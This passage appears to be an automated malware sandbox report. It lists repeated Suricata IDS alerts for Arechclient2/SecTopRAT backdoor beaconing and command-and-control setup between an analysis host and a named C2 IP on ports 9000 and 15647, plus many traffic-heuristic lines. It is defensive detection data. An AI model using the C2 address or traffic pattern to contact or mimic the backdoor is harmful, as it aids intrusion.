                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49789 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49777 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49785 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49780 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49779 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49782 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49797 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49794 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49786 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49791 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49800 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49799 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49805 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49802 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49803 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49809 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49796 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49817 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49818 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49812 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49808 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49816 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49819 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49814 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49822 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49817
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49818
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49821 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49809
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49822
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49820 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49823 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49813 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49815 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49824 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49811 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49825 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49827 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49793 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49826 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49828 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49829 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49830 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49831 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49832 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49833 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49807 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49835 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49836 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49827
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49837 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49838 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49839 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49840 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49841 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49843 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49844 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49842 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49845 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49846 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49847 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49849 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49850 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49851 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49852 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49853 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49854 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49855 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49858 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49859 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49857 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49860 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49861 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49862 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49864 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49865 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49866 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49868 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49867 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49869 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49859
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49834 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49870 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49858
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49871 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49872 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49873 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49875 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49874 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49877 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49868
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49878 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49879 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49880 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49881 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49863 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49875
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49883 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49884 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49885 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49886 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49887 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49876 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49888 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49889 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49890 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49891 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49893 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49894 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49892 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49895 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49893
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49896 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49897 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49898 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49900 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49899 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49902 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49901 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49903 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49904 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49905 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49906 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49908 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49909 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49908
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49902
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49907 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49882 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49848 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49856 -> 185.147.124.236:9000
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 185.147.124.236 ports 9000,1,4,5,6,7,15647
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49779
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49786
